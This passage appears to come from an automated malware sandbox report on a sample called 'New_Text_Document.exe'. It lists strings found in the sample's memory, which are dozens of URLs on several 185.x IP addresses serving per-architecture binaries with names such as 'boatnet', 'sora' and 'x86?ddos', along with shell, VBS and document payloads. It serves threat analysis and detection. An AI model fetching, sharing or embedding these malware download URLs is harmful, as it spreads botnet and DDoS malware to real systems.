                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.225.74.161/bins/ppc
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.225.74.161/bins/sh4
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.225.74.161/bins/shellarm
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.225.74.161/bins/shellarm5
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.225.74.161/bins/shellarm6
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.225.74.161/bins/shellarm7
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.225.74.161/bins/shellm68k
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.225.74.161/bins/shellmips
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.225.74.161/bins/shellmpsl
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.225.74.161/bins/shellppc
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.225.74.161/bins/shellsh4
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.225.74.161/bins/shellspc
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.225.74.161/bins/shellx86
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.225.74.161/bins/shellx86?ddos
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.225.74.161/bins/spc
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.225.74.161/bins/splm68k
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.225.74.161/bins/x86
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.225.74.161/bins/x86?ddos
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.225.74.161/bins/xmips
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.225.74.161/jklarm
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.225.74.161/jklarm5
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.225.74.161/jklarm7
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.225.74.161/jklmips
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.225.74.161/jklmpsl
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.225.74.161/m68k
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.225.74.161/mips
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.225.74.161/mpsl
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.225.74.161/ppc
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.225.74.161/sh4
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.225.74.161/shellarm
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.225.74.161/shellarm7
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.225.74.161/spc
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.225.74.161/splarm
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.225.74.161/splarm5
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.225.74.161/splarm6
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.225.74.161/splarm7
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.225.74.161/splm68k
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.225.74.161/splmips
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.225.74.161/splmpsl
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.225.74.161/splppc
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.225.74.161/splsh4
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.225.74.161/splspc
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.225.74.161/splx86
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.225.74.161/splx86?ddos
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.225.74.161/x86
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.225.74.193/hiddenbin/boatnet.arm
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.225.74.193/hiddenbin/boatnet.arm5
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.225.74.193/hiddenbin/boatnet.arm6
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.225.74.193/hiddenbin/boatnet.arm7
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.225.74.193/hiddenbin/boatnet.m68k
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.225.74.193/hiddenbin/boatnet.mpsl
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.225.74.193/hiddenbin/boatnet.ppc
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.225.74.193/hiddenbin/boatnet.sh4
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.225.74.193/hiddenbin/boatnet.spc
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.225.74.193/hiddenbin/boatnet.x86
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.225.74.193/ohshit.sh
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.225.74.251/arc
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.225.74.251/armv4l
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.225.74.251/armv5l
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.225.74.251/armv6l
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.225.74.251/armv7l
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.225.74.251/i686
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.225.74.251/mips
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.225.74.251/mipsel
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.225.74.251/sh4
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.225.74.251/sparc
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.225.75.206/arm
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.225.75.206/arm7
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.240.97.239:64683/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.243.172.196:36782/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000035DA000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.254.37.174/HTMLEVENbrowser.dOC
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000035DA000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.254.37.174/eveningFile.vbs
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.000000000347B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.254.37.174/privateexploiteveningFile.vbs
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.000000000347B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.254.37.174/pvtHTMLbroswer.dOC
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000035DA000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.254.37.196/bins/sora.arm
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000035DA000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.254.37.196/bins/sora.arm5
